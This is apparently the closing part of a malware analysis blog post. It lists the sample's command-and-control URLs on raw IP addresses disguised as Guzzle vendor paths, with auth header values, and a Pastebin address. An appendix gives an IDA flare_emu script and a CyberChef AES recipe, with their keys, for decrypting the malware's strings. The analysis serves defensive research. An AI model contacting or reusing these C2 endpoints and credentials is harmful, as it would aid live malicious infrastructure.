{"url":"http://148.102.51.6/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php","authHeader":"LJHRQWE"} {"url":"http://158.177.2.191/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php","authHeader":"SLDJKFA"} {"url":"http://64.227.0.146/vendor/guzzlehttp/guzzle/src/Handler/CurlSingleHandler.php","authHeader":"Linux Max"}' {"url":"http://216.238.103.62:8013/vendor/guzzlehttp/guzzle/src/Exception/DNSException.php","authHeader":"Rbz021g6"} PASTEBIN Address:https://pastebin[.]com/GYEBVyMR {"url":"http://52.0.85.62/vendor/guzzlehttp/guzzle/src/Exception/detail.php","authHeader":"GGSEDPHP","clientUrl":"http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/mY5bJK7e","runnerUrl":"http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd"} APPENDIX IDA SCRIPT # Install flare_emu first # Only test with 93a7cba1edbacb633021ebc38c10a79f # Modify 'decstr_addr' in in your case import flare_emu import base64 import string def decode(cipher): tmp = cipher[::-1] + b"=" * ((4 - len(cipher) % 4) ) out = bytearray() for i, v in enumerate(base64.urlsafe_b64decode(tmp)): cha = v ^ key[i % len(key)] if chr(cha) in string.ascii_letters: cha ^= 0x20 out.append(cha) out += b"=" * ((4 - len(out) % 4) % 4) return base64.urlsafe_b64decode(out) def iterateCallback(eh, address, argv, userData): ro=ida_segment.get_segm_by_name(".rodata") if ro.start_ea <= argv[0] <=ro.end_ea: buff=eh.getEmuString(argv[0]) if len(buff)>0: plain=decode(buff) print(hex(argv[0]),buff,"<==============>",plain) ida_bytes.put_bytes(argv[0],b'\x00'*len(buff)) ida_bytes.put_bytes(argv[0],plain) decstr_addr=0x0000FCD0 key=bytes.fromhex('43 72 61 63 6B 61 6C 61 63 6B 69 6E 27') eh=flare_emu.EmuHelper() eh.iterate(decstr_addr,iterateCallback) CYBERCHEF https://gchq.github.io/CyberChef/#recipe=AES_Decrypt(%7B'option':'Hex','string':'2D%208C%207F%20EE%2042%20D3%20DB%204A%208E%2055%20FB%20FF%2065%2035%201E%201B'%7D,%7B'option':'Hex','string':'B8%20AD%20DB%20A8%20FC%20BD%200F%2085%20EE%201C%20A5%2003%203D%200D%20F3%2042'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D) Please enable JavaScript to view the comments powered by Disqus. 奇安信 X 实验室 © 2024 * RSS Powered by Ghost